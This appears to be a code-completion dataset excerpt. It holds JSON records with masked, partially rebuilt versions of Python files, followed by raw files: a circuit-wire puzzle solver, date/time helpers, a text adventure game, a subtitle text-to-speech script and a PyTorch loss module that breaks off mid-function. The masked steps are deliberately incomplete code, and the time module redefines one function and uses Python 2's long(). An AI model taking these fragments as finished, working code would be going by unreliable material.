"step-4": "<mask token>\n\n\ndef isnum(name):\n return name.startswith('-') or name.isdigit()\n\n\nclass WireValues:\n\n def __init__(self):\n self.wires = {}\n\n def __getitem__(self, name):\n return int(name) if isnum(name) else self.wires[name]\n\n def __setitem__(self, name, value):\n self.wires[name] = value\n\n def __contains__(self, name):\n return isnum(name) or name in self.wires\n\n\nCommand = namedtuple('Command', 'pattern function')\nWireLink = namedtuple('WireLink', 'command inputs output')\nCOMMANDS = []\n\n\ndef make_command(expr):\n pattern = re.compile('^' + expr.replace('#', '([0-9a-z]+)') + '$')\n\n def command_maker(function):\n command = Command(pattern, function)\n COMMANDS.append(command)\n return command\n return command_maker\n\n\n@make_command('# -> #')\ndef assignment(wires, v1, name):\n wires[name] = wires[v1]\n\n\n@make_command('# AND # -> #')\ndef anding(wires, v1, v2, name):\n wires[name] = wires[v1] & wires[v2]\n\n\n@make_command('# OR # -> #')\ndef oring(wires, v1, v2, name):\n wires[name] = wires[v1] | wires[v2]\n\n\n@make_command('# LSHIFT # -> #')\ndef lshift(wires, v1, v2, name):\n wires[name] = wires[v1] << wires[v2]\n\n\n@make_command('# RSHIFT # -> #')\ndef rshift(wires, v1, v2, name):\n wires[name] = wires[v1] >> wires[v2]\n\n\n@make_command('NOT # -> #')\ndef notting(wires, v1, name):\n wires[name] = (1 << 16) - 1 & ~wires[v1]\n\n\ndef create_link(line):\n for cmd in COMMANDS:\n m = re.match(cmd.pattern, line)\n if m:\n gps = m.groups()\n return WireLink(cmd, gps[:-1], gps[-1])\n raise ValueError(repr(line))\n\n\ndef process_links(links):\n wires = WireValues()\n while links:\n remaining = []\n for link in links:\n if all(i in wires for i in link.inputs):\n link.command.function(wires, *link.inputs, link.output)\n else:\n remaining.append(link)\n links = remaining\n return wires\n\n\ndef main():\n lines = sys.stdin.read().strip().split('\\n')\n links = [create_link(line) for line in lines]\n wires = process_links(links)\n answer = wires['a']\n print('Part 1 wire a:', answer)\n index = next(i for i, link in enumerate(links) if link.output == 'b')\n links[index] = WireLink(assignment, [str(answer)], 'b')\n wires = process_links(links)\n answer = wires['a']\n print('Part 2 wire a:', answer)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python3\n\nimport sys\nimport re\n\nfrom collections import namedtuple\n\ndef isnum(name):\n return name.startswith('-') or name.isdigit()\n\nclass WireValues:\n def __init__(self):\n self.wires = {}\n def __getitem__(self, name):\n return int(name) if isnum(name) else self.wires[name]\n def __setitem__(self, name, value):\n self.wires[name] = value\n def __contains__(self, name):\n return isnum(name) or name in self.wires\n\nCommand = namedtuple('Command', 'pattern function')\nWireLink = namedtuple('WireLink', 'command inputs output')\n\nCOMMANDS = []\n\ndef make_command(expr):\n pattern = re.compile('^'+expr.replace('#', '([0-9a-z]+)')+'$')\n def command_maker(function):\n command = Command(pattern, function)\n COMMANDS.append(command)\n return command\n return command_maker\n\n@make_command('# -> #')\ndef assignment(wires, v1, name):\n wires[name] = wires[v1]\n\n@make_command('# AND # -> #')\ndef anding(wires, v1, v2, name):\n wires[name] = wires[v1] & wires[v2]\n\n@make_command('# OR # -> #')\ndef oring(wires, v1, v2, name):\n wires[name] = wires[v1] | wires[v2]\n\n@make_command('# LSHIFT # -> #')\ndef lshift(wires, v1, v2, name):\n wires[name] = wires[v1] << wires[v2]\n\n@make_command('# RSHIFT # -> #')\ndef rshift(wires, v1, v2, name):\n wires[name] = wires[v1] >> wires[v2]\n\n@make_command('NOT # -> #')\ndef notting(wires, v1, name):\n wires[name] = ((1<<16)-1)&~wires[v1]\n\ndef create_link(line):\n for cmd in COMMANDS:\n m = re.match(cmd.pattern, line)\n if m:\n gps = m.groups()\n return WireLink(cmd, gps[:-1], gps[-1])\n raise ValueError(repr(line))\n\ndef process_links(links):\n wires = WireValues()\n while links:\n remaining = []\n for link in links:\n if all(i in wires for i in link.inputs):\n link.command.function(wires, *link.inputs, link.output)\n else:\n remaining.append(link)\n links = remaining\n return wires\n\ndef main():\n lines = sys.stdin.read().strip().split('\\n')\n links = [create_link(line) for line in lines]\n wires = process_links(links)\n answer = wires['a']\n print(\"Part 1 wire a:\", answer)\n index = next(i for (i,link) in enumerate(links) if link.output=='b')\n links[index] = WireLink(assignment, [str(answer)], 'b')\n wires = process_links(links)\n answer = wires['a']\n print(\"Part 2 wire a:\", answer)\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
7,
14,
16,
18,
20
]
}
|
[
7,
14,
16,
18,
20
] |
# -*- coding: utf-8 -*-
import time
import datetime
def get_second_long(time_str=None):
if time_str is None:
return long(time.time())
time_array = time.strptime(time_str, "%Y-%m-%d %H:%M:%S")
return long(time.mktime(time_array))
def get_curtime_str():
return datetime.datetime.now()
def get_curtimestamp():
return int(time.time() * 1000)
def get_curdatetime_format():
return get_curtime_str().strftime("%Y-%m-%d %H:%M:%S")
def get_curdate_format():
return get_curtime_str().strftime("%Y-%m-%d")
def get_curmonth_format():
return get_curtime_str().strftime("%Y-%m")
def get_curhour_str():
return get_curtime_str().hour
def get_curminuter_str():
return get_curtime_str().minute
def get_curday_str():
return get_curtime_str().day
def get_curdate_str():
return get_curtime_str().strftime("%Y%m%d")
def get_curdatetime_str():
return get_curtime_str().strftime("%Y%m%d%H%M%S")
def get_curminuter_str():
return get_curtime_str().strftime("%Y%m%d%H%M")
|
normal
|
{
"blob_id": "e735529eddd3a46ea335e593e5937558b50b142d",
"index": 2276,
"step-1": "<mask token>\n\n\ndef get_second_long(time_str=None):\n if time_str is None:\n return long(time.time())\n time_array = time.strptime(time_str, '%Y-%m-%d %H:%M:%S')\n return long(time.mktime(time_array))\n\n\n<mask token>\n\n\ndef get_curtimestamp():\n return int(time.time() * 1000)\n\n\n<mask token>\n\n\ndef get_curdate_format():\n return get_curtime_str().strftime('%Y-%m-%d')\n\n\ndef get_curmonth_format():\n return get_curtime_str().strftime('%Y-%m')\n\n\n<mask token>\n\n\ndef get_curday_str():\n return get_curtime_str().day\n\n\ndef get_curdate_str():\n return get_curtime_str().strftime('%Y%m%d')\n\n\ndef get_curdatetime_str():\n return get_curtime_str().strftime('%Y%m%d%H%M%S')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_second_long(time_str=None):\n if time_str is None:\n return long(time.time())\n time_array = time.strptime(time_str, '%Y-%m-%d %H:%M:%S')\n return long(time.mktime(time_array))\n\n\n<mask token>\n\n\ndef get_curtimestamp():\n return int(time.time() * 1000)\n\n\ndef get_curdatetime_format():\n return get_curtime_str().strftime('%Y-%m-%d %H:%M:%S')\n\n\ndef get_curdate_format():\n return get_curtime_str().strftime('%Y-%m-%d')\n\n\ndef get_curmonth_format():\n return get_curtime_str().strftime('%Y-%m')\n\n\n<mask token>\n\n\ndef get_curday_str():\n return get_curtime_str().day\n\n\ndef get_curdate_str():\n return get_curtime_str().strftime('%Y%m%d')\n\n\ndef get_curdatetime_str():\n return get_curtime_str().strftime('%Y%m%d%H%M%S')\n\n\ndef get_curminuter_str():\n return get_curtime_str().strftime('%Y%m%d%H%M')\n",
"step-3": "<mask token>\n\n\ndef get_second_long(time_str=None):\n if time_str is None:\n return long(time.time())\n time_array = time.strptime(time_str, '%Y-%m-%d %H:%M:%S')\n return long(time.mktime(time_array))\n\n\n<mask token>\n\n\ndef get_curtimestamp():\n return int(time.time() * 1000)\n\n\ndef get_curdatetime_format():\n return get_curtime_str().strftime('%Y-%m-%d %H:%M:%S')\n\n\ndef get_curdate_format():\n return get_curtime_str().strftime('%Y-%m-%d')\n\n\ndef get_curmonth_format():\n return get_curtime_str().strftime('%Y-%m')\n\n\n<mask token>\n\n\ndef get_curminuter_str():\n return get_curtime_str().minute\n\n\ndef get_curday_str():\n return get_curtime_str().day\n\n\ndef get_curdate_str():\n return get_curtime_str().strftime('%Y%m%d')\n\n\ndef get_curdatetime_str():\n return get_curtime_str().strftime('%Y%m%d%H%M%S')\n\n\ndef get_curminuter_str():\n return get_curtime_str().strftime('%Y%m%d%H%M')\n",
"step-4": "<mask token>\n\n\ndef get_second_long(time_str=None):\n if time_str is None:\n return long(time.time())\n time_array = time.strptime(time_str, '%Y-%m-%d %H:%M:%S')\n return long(time.mktime(time_array))\n\n\n<mask token>\n\n\ndef get_curtimestamp():\n return int(time.time() * 1000)\n\n\ndef get_curdatetime_format():\n return get_curtime_str().strftime('%Y-%m-%d %H:%M:%S')\n\n\ndef get_curdate_format():\n return get_curtime_str().strftime('%Y-%m-%d')\n\n\ndef get_curmonth_format():\n return get_curtime_str().strftime('%Y-%m')\n\n\ndef get_curhour_str():\n return get_curtime_str().hour\n\n\ndef get_curminuter_str():\n return get_curtime_str().minute\n\n\ndef get_curday_str():\n return get_curtime_str().day\n\n\ndef get_curdate_str():\n return get_curtime_str().strftime('%Y%m%d')\n\n\ndef get_curdatetime_str():\n return get_curtime_str().strftime('%Y%m%d%H%M%S')\n\n\ndef get_curminuter_str():\n return get_curtime_str().strftime('%Y%m%d%H%M')\n",
"step-5": "# -*- coding: utf-8 -*-\n\nimport time\nimport datetime\n\n\ndef get_second_long(time_str=None):\n if time_str is None:\n return long(time.time())\n time_array = time.strptime(time_str, \"%Y-%m-%d %H:%M:%S\")\n return long(time.mktime(time_array))\n\n\ndef get_curtime_str():\n return datetime.datetime.now()\n\n\ndef get_curtimestamp():\n return int(time.time() * 1000)\n\n\ndef get_curdatetime_format():\n return get_curtime_str().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\ndef get_curdate_format():\n return get_curtime_str().strftime(\"%Y-%m-%d\")\n\n\ndef get_curmonth_format():\n return get_curtime_str().strftime(\"%Y-%m\")\n\n\ndef get_curhour_str():\n return get_curtime_str().hour\n\n\ndef get_curminuter_str():\n return get_curtime_str().minute\n\n\ndef get_curday_str():\n return get_curtime_str().day\n\n\ndef get_curdate_str():\n return get_curtime_str().strftime(\"%Y%m%d\")\n\n\ndef get_curdatetime_str():\n return get_curtime_str().strftime(\"%Y%m%d%H%M%S\")\n\n\ndef get_curminuter_str():\n return get_curtime_str().strftime(\"%Y%m%d%H%M\")\n\n\n\n\n\n",
"step-ids": [
7,
9,
10,
11,
14
]
}
|
[
7,
9,
10,
11,
14
] |
from room import Room
from player import Player
from item import Item
# Declare all the rooms
items = {
'scimitar': Item('Scimitar', '+7 Attack'),
'mace': Item('Mace', '+13 Attack'),
'tower_shield': Item('Tower Shield', '+8 Block'),
'heraldic_shield': Item('Heraldic Shield', '+12 Block'),
'chainmail': Item('Chainmail', '+15 Defense'),
'gold_plate': Item('Gold Plate', '+25 Defense'),
'health_potion': Item('Health Potion', 'Heal 10 HP'),
'mana_potion': Item('Mana Potion', 'Restore 20 Mana'),
'gold': Item('Gold', 'Currency for other items from vendors'),
'demon_heart': Item('Demon Heart', 'Bestows owner with great power')
}
room = {
'outside': Room("Outside Cave Entrance",
"""North of you, the cave mount beckons""",
[items['scimitar'], items['health_potion']]),
'foyer': Room("Foyer", """Dim light filters in from the south. Dusty
passages run north and east.""",
[items['tower_shield'], items['chainmail']]),
'overlook': Room("Grand Overlook", """A steep cliff appears before you, falling
into the darkness. Ahead to the north, a light flickers in
the distance, but there is no way across the chasm.""",
[items['mace'], items['mana_potion']]),
'narrow': Room("Narrow Passage", """The narrow passage bends here from west
to north. The smell of gold permeates the air.""",
[items['gold_plate'], items['heraldic_shield']]),
'treasure': Room("Treasure Chamber", """You've found the long-lost treasure
chamber! Sadly, it has already been completely emptied by
earlier adventurers. The only exit is to the south.""",
[items['gold'], items['demon_heart']]),
}
# Link rooms together
room['outside'].n_to = room['foyer']
room['foyer'].s_to = room['outside']
room['foyer'].n_to = room['overlook']
room['foyer'].e_to = room['narrow']
room['overlook'].s_to = room['foyer']
room['narrow'].w_to = room['foyer']
room['narrow'].n_to = room['treasure']
room['treasure'].s_to = room['narrow']
# Main
player = Player(room['outside'])
suppressRoomPrint = False
while True:
if suppressRoomPrint:
suppressRoomPrint = False
else:
print (player.location)
print (f'\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n')
inp = input("What is your command: ")
if inp == "q":
break
if inp == "n" or inp == "s" or inp == "w" or inp == "e":
newRoom = player.location.getRoomInDirection(inp)
if newRoom == None:
print('\x1b[1;37;41m + \nImpossible, try again.\n\x1b[0m')
suppressRoomPrint = True
else:
player.change_location(newRoom)
|
normal
|
{
"blob_id": "07a172c28057dc803efdbdc10a9e2e11df4e527b",
"index": 3134,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print(player.location)\n print(\n f\"\"\"\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n\"\"\"\n )\n inp = input('What is your command: ')\n if inp == 'q':\n break\n if inp == 'n' or inp == 's' or inp == 'w' or inp == 'e':\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)\n",
"step-3": "<mask token>\nitems = {'scimitar': Item('Scimitar', '+7 Attack'), 'mace': Item('Mace',\n '+13 Attack'), 'tower_shield': Item('Tower Shield', '+8 Block'),\n 'heraldic_shield': Item('Heraldic Shield', '+12 Block'), 'chainmail':\n Item('Chainmail', '+15 Defense'), 'gold_plate': Item('Gold Plate',\n '+25 Defense'), 'health_potion': Item('Health Potion', 'Heal 10 HP'),\n 'mana_potion': Item('Mana Potion', 'Restore 20 Mana'), 'gold': Item(\n 'Gold', 'Currency for other items from vendors'), 'demon_heart': Item(\n 'Demon Heart', 'Bestows owner with great power')}\nroom = {'outside': Room('Outside Cave Entrance',\n 'North of you, the cave mount beckons', [items['scimitar'], items[\n 'health_potion']]), 'foyer': Room('Foyer',\n \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\"\n , [items['tower_shield'], items['chainmail']]), 'overlook': Room(\n 'Grand Overlook',\n \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"\n , [items['mace'], items['mana_potion']]), 'narrow': Room(\n 'Narrow Passage',\n \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"\n , [items['gold_plate'], items['heraldic_shield']]), 'treasure': Room(\n 'Treasure Chamber',\n \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\"\n , [items['gold'], items['demon_heart']])}\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\nplayer = Player(room['outside'])\nsuppressRoomPrint = False\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print(player.location)\n print(\n f\"\"\"\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n\"\"\"\n )\n inp = input('What is your command: ')\n if inp == 'q':\n break\n if inp == 'n' or inp == 's' or inp == 'w' or inp == 'e':\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)\n",
"step-4": "from room import Room\nfrom player import Player\nfrom item import Item\nitems = {'scimitar': Item('Scimitar', '+7 Attack'), 'mace': Item('Mace',\n '+13 Attack'), 'tower_shield': Item('Tower Shield', '+8 Block'),\n 'heraldic_shield': Item('Heraldic Shield', '+12 Block'), 'chainmail':\n Item('Chainmail', '+15 Defense'), 'gold_plate': Item('Gold Plate',\n '+25 Defense'), 'health_potion': Item('Health Potion', 'Heal 10 HP'),\n 'mana_potion': Item('Mana Potion', 'Restore 20 Mana'), 'gold': Item(\n 'Gold', 'Currency for other items from vendors'), 'demon_heart': Item(\n 'Demon Heart', 'Bestows owner with great power')}\nroom = {'outside': Room('Outside Cave Entrance',\n 'North of you, the cave mount beckons', [items['scimitar'], items[\n 'health_potion']]), 'foyer': Room('Foyer',\n \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\"\n , [items['tower_shield'], items['chainmail']]), 'overlook': Room(\n 'Grand Overlook',\n \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"\n , [items['mace'], items['mana_potion']]), 'narrow': Room(\n 'Narrow Passage',\n \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"\n , [items['gold_plate'], items['heraldic_shield']]), 'treasure': Room(\n 'Treasure Chamber',\n \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\"\n , [items['gold'], items['demon_heart']])}\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\nplayer = Player(room['outside'])\nsuppressRoomPrint = False\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print(player.location)\n print(\n f\"\"\"\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n\"\"\"\n )\n inp = input('What is your command: ')\n if inp == 'q':\n break\n if inp == 'n' or inp == 's' or inp == 'w' or inp == 'e':\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)\n",
"step-5": "from room import Room\nfrom player import Player\nfrom item import Item\n# Declare all the rooms\nitems = {\n 'scimitar': Item('Scimitar', '+7 Attack'),\n 'mace': Item('Mace', '+13 Attack'),\n 'tower_shield': Item('Tower Shield', '+8 Block'),\n 'heraldic_shield': Item('Heraldic Shield', '+12 Block'),\n 'chainmail': Item('Chainmail', '+15 Defense'),\n 'gold_plate': Item('Gold Plate', '+25 Defense'),\n 'health_potion': Item('Health Potion', 'Heal 10 HP'),\n 'mana_potion': Item('Mana Potion', 'Restore 20 Mana'),\n 'gold': Item('Gold', 'Currency for other items from vendors'),\n 'demon_heart': Item('Demon Heart', 'Bestows owner with great power')\n}\n\nroom = {\n 'outside': Room(\"Outside Cave Entrance\",\n \"\"\"North of you, the cave mount beckons\"\"\",\n [items['scimitar'], items['health_potion']]),\n\n 'foyer': Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\",\n[items['tower_shield'], items['chainmail']]),\n\n 'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\",\n[items['mace'], items['mana_potion']]),\n\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\",\n[items['gold_plate'], items['heraldic_shield']]),\n\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\",\n[items['gold'], items['demon_heart']]),\n}\n\n# Link rooms together\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\n\n# Main\n\nplayer = Player(room['outside'])\n\nsuppressRoomPrint = False\n\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print (player.location)\n print (f'\\n{player.location.name}\\n {player.location.description}\\n {player.location.getItems()}\\n')\n inp = input(\"What is your command: \")\n\n if inp == \"q\":\n break\n if inp == \"n\" or inp == \"s\" or inp == \"w\" or inp == \"e\":\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import pyttsx3
from pydub import AudioSegment
engine = pyttsx3.init() # object creation
""" RATE"""
#printing current voice rate
engine.setProperty('rate', 150) # setting up new voice rate
rate = engine.getProperty('rate') # getting details of current speaking rate
print (rate)
"""VOLUME"""
# volume = engine.getProperty('volume') #getting to know current volume level (min=0 and max=1)
# print (volume) #printing current volume level
# engine.setProperty('volume',1.0) # setting up volume level between 0 and 1
# """VOICE"""
# voices = engine.getProperty('voices') #getting details of current voice
# #engine.setProperty('voice', voices[0].id) #changing index, changes voices. o for male
# engine.setProperty('voice', voices[1].id) #changing index, changes voices. 1 for female
# engine.say("Hello World!")
# engine.say('My current speaking rate is ' + str(rate))
# engine.runAndWait()
# engine.stop()
"""Saving Voice to a file"""
# On linux make sure that 'espeak' and 'ffmpeg' are installed
a=open('TrumpNewFF.srt').readlines()
i=2
l = len(a)
while i<l:
engine.save_to_file(a[i], 'TTS/trump/{}.mp3'.format(str(i)))
engine.runAndWait()
if i+3<l:
time_1 = a[i-1].split(' --> ')[1].split(':')
time_1_mil = time_1[-1].split(',')
time_1_mil = int(time_1_mil[0])*1000+int(time_1_mil[1])%1000
time_1_hour = float(time_1[-2])*60000
time_2 = a[i+3].split(' --> ')[0].split(':')
time_2_hour = float(time_2[-2])*60000
time_2_mil = time_2[-1].split(',')
time_2_mil = int(time_2_mil[0])*1000+int(time_2_mil[1])%1000
duration = float(time_2_hour+time_2_mil)-float(time_1_hour+time_1_mil)
# create 1 sec of silence audio segment
one_sec_segment = AudioSegment.silent(duration=int(duration)) #duration in milliseconds
print(i, duration, time_2_hour+time_2_mil, time_1_hour+time_1_mil)
#Either save modified audio
one_sec_segment.export('TTS/trump/{}.mp3'.format(str(i+1)), format="wav")
i+=4
engine.stop()
|
normal
|
{
"blob_id": "32f4f7ad61b99848c907e092c5ed7a839f0b352b",
"index": 6399,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nengine.setProperty('rate', 150)\n<mask token>\nprint(rate)\n<mask token>\nwhile i < l:\n engine.save_to_file(a[i], 'TTS/trump/{}.mp3'.format(str(i)))\n engine.runAndWait()\n if i + 3 < l:\n time_1 = a[i - 1].split(' --> ')[1].split(':')\n time_1_mil = time_1[-1].split(',')\n time_1_mil = int(time_1_mil[0]) * 1000 + int(time_1_mil[1]) % 1000\n time_1_hour = float(time_1[-2]) * 60000\n time_2 = a[i + 3].split(' --> ')[0].split(':')\n time_2_hour = float(time_2[-2]) * 60000\n time_2_mil = time_2[-1].split(',')\n time_2_mil = int(time_2_mil[0]) * 1000 + int(time_2_mil[1]) % 1000\n duration = float(time_2_hour + time_2_mil) - float(time_1_hour +\n time_1_mil)\n one_sec_segment = AudioSegment.silent(duration=int(duration))\n print(i, duration, time_2_hour + time_2_mil, time_1_hour + time_1_mil)\n one_sec_segment.export('TTS/trump/{}.mp3'.format(str(i + 1)),\n format='wav')\n i += 4\nengine.stop()\n",
"step-3": "<mask token>\nengine = pyttsx3.init()\n<mask token>\nengine.setProperty('rate', 150)\nrate = engine.getProperty('rate')\nprint(rate)\n<mask token>\na = open('TrumpNewFF.srt').readlines()\ni = 2\nl = len(a)\nwhile i < l:\n engine.save_to_file(a[i], 'TTS/trump/{}.mp3'.format(str(i)))\n engine.runAndWait()\n if i + 3 < l:\n time_1 = a[i - 1].split(' --> ')[1].split(':')\n time_1_mil = time_1[-1].split(',')\n time_1_mil = int(time_1_mil[0]) * 1000 + int(time_1_mil[1]) % 1000\n time_1_hour = float(time_1[-2]) * 60000\n time_2 = a[i + 3].split(' --> ')[0].split(':')\n time_2_hour = float(time_2[-2]) * 60000\n time_2_mil = time_2[-1].split(',')\n time_2_mil = int(time_2_mil[0]) * 1000 + int(time_2_mil[1]) % 1000\n duration = float(time_2_hour + time_2_mil) - float(time_1_hour +\n time_1_mil)\n one_sec_segment = AudioSegment.silent(duration=int(duration))\n print(i, duration, time_2_hour + time_2_mil, time_1_hour + time_1_mil)\n one_sec_segment.export('TTS/trump/{}.mp3'.format(str(i + 1)),\n format='wav')\n i += 4\nengine.stop()\n",
"step-4": "import pyttsx3\nfrom pydub import AudioSegment\nengine = pyttsx3.init()\n<mask token>\nengine.setProperty('rate', 150)\nrate = engine.getProperty('rate')\nprint(rate)\n<mask token>\na = open('TrumpNewFF.srt').readlines()\ni = 2\nl = len(a)\nwhile i < l:\n engine.save_to_file(a[i], 'TTS/trump/{}.mp3'.format(str(i)))\n engine.runAndWait()\n if i + 3 < l:\n time_1 = a[i - 1].split(' --> ')[1].split(':')\n time_1_mil = time_1[-1].split(',')\n time_1_mil = int(time_1_mil[0]) * 1000 + int(time_1_mil[1]) % 1000\n time_1_hour = float(time_1[-2]) * 60000\n time_2 = a[i + 3].split(' --> ')[0].split(':')\n time_2_hour = float(time_2[-2]) * 60000\n time_2_mil = time_2[-1].split(',')\n time_2_mil = int(time_2_mil[0]) * 1000 + int(time_2_mil[1]) % 1000\n duration = float(time_2_hour + time_2_mil) - float(time_1_hour +\n time_1_mil)\n one_sec_segment = AudioSegment.silent(duration=int(duration))\n print(i, duration, time_2_hour + time_2_mil, time_1_hour + time_1_mil)\n one_sec_segment.export('TTS/trump/{}.mp3'.format(str(i + 1)),\n format='wav')\n i += 4\nengine.stop()\n",
"step-5": "import pyttsx3\r\nfrom pydub import AudioSegment\r\n\r\nengine = pyttsx3.init() # object creation\r\n\r\n\"\"\" RATE\"\"\"\r\n #printing current voice rate\r\nengine.setProperty('rate', 150) # setting up new voice rate\r\nrate = engine.getProperty('rate') # getting details of current speaking rate\r\nprint (rate) \r\n\r\n\"\"\"VOLUME\"\"\"\r\n# volume = engine.getProperty('volume') #getting to know current volume level (min=0 and max=1)\r\n# print (volume) #printing current volume level\r\n# engine.setProperty('volume',1.0) # setting up volume level between 0 and 1\r\n\r\n# \"\"\"VOICE\"\"\"\r\n# voices = engine.getProperty('voices') #getting details of current voice\r\n# #engine.setProperty('voice', voices[0].id) #changing index, changes voices. o for male\r\n# engine.setProperty('voice', voices[1].id) #changing index, changes voices. 1 for female\r\n\r\n# engine.say(\"Hello World!\")\r\n# engine.say('My current speaking rate is ' + str(rate))\r\n# engine.runAndWait()\r\n# engine.stop()\r\n\r\n\"\"\"Saving Voice to a file\"\"\"\r\n# On linux make sure that 'espeak' and 'ffmpeg' are installed\r\na=open('TrumpNewFF.srt').readlines()\r\ni=2\r\nl = len(a)\r\nwhile i<l:\r\n engine.save_to_file(a[i], 'TTS/trump/{}.mp3'.format(str(i)))\r\n engine.runAndWait()\r\n if i+3<l:\r\n time_1 = a[i-1].split(' --> ')[1].split(':')\r\n time_1_mil = time_1[-1].split(',')\r\n time_1_mil = int(time_1_mil[0])*1000+int(time_1_mil[1])%1000\r\n time_1_hour = float(time_1[-2])*60000\r\n \r\n time_2 = a[i+3].split(' --> ')[0].split(':')\r\n time_2_hour = float(time_2[-2])*60000\r\n time_2_mil = time_2[-1].split(',')\r\n time_2_mil = int(time_2_mil[0])*1000+int(time_2_mil[1])%1000\r\n \r\n duration = float(time_2_hour+time_2_mil)-float(time_1_hour+time_1_mil) \r\n # create 1 sec of silence audio segment\r\n one_sec_segment = AudioSegment.silent(duration=int(duration)) #duration in milliseconds\r\n \r\n \r\n print(i, duration, time_2_hour+time_2_mil, time_1_hour+time_1_mil)\r\n #Either save modified audio\r\n one_sec_segment.export('TTS/trump/{}.mp3'.format(str(i+1)), format=\"wav\")\r\n i+=4\r\nengine.stop()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import torch
import torch.nn as nn
class ReconstructionLoss(nn.Module):
def __init__(self, config):
super(ReconstructionLoss, self).__init__()
self.velocity_dim = config.velocity_dim
def forward(self, pre_seq, gt_seq):
MSE_loss = nn.MSELoss()
rec_loss = MSE_loss(pre_seq[:, 1:-1, :], gt_seq[:, 1:-1, :])+ \
MSE_loss(pre_seq[:, -1, :], gt_seq[:, -1, :]) + \
MSE_loss(pre_seq[:, 0, :-self.velocity_dim], gt_seq[:, 0, :-self.velocity_dim])
return rec_loss * 3
class BoneLoss(nn.Module):
def __init__(self, gt_bone_length, parents, _mean, _std, config):
super(BoneLoss, self).__init__()
self.gt_bone_length = gt_bone_length
self.parents = parents
self._mean = _mean
self._std = _std
self.device = config.device
self.pos_dim = config.pos_dim
def calculate_bone_length_for_seq(self, seq):
# AddBackward0 [batch_size, T, size]
src_seq = seq[..., :self.pos_dim] * self._std[:self.pos_dim] + self._mean[:self.pos_dim]
# ViewBackward [batch_size, T, J-1, 3]
new_seq = src_seq.view(src_seq.shape[0], src_seq.shape[1], int(src_seq.shape[2] / 3), 3)
root_pos = torch.tensor([[0, 0, 0]], dtype=torch.float32).to(self.device)
root_positions = torch.unsqueeze(torch.unsqueeze(root_pos, 0), 0)
root_positions = root_positions.repeat(src_seq.shape[0], src_seq.shape[1], 1, 1)
# CatBackward [batch_size, T, J, 3]
positions = torch.cat((root_positions, new_seq), 2)
# [200, 6, 23]
result_list = torch.empty((src_seq.shape[0], src_seq.shape[1], int(src_seq.shape[2] / 3)),
dtype=torch.float32).to(self.device)
index = 0
for joint, parent in enumerate(self.parents):
if parent == -1:
continue
# [200, 6, 3] SelectBackward
joint_pos = positions[:, :, joint]
parent_pos = positions[:, :, parent]
# [200, 6] SubBackward0
delta_x = joint_pos[..., 0] - parent_pos[..., 0]
